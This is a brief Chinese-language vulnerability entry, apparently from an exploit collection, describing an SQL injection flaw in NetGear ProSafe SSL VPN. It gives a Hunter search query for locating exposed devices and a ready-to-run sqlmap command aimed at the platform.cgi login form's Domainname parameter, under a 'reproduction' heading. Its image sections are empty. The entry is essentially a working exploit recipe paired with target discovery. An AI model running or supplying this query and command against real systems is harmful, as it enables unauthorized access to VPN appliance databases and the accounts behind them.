N3-2NetGear-ProSafeSSLVPN-SQL
漏洞描述:
NetGear ProSafe SSL VPN存在SQL注入漏洞,可能允许攻击者通过构造特定的SQL查询来操纵数据库。
影响版本:
- NetGear-ProSafeSSLVPN
网站图片:
网络测绘:
Hunter 语法:
- hunterapp.name==“NETGEAR ProSAFE”
漏洞复现:
payload:
sqlmap -u "https://xx.xx.xx.xx/scgi-bin/platform.cgi" --form -p USERDBDomains.Domainname --batch
效果图: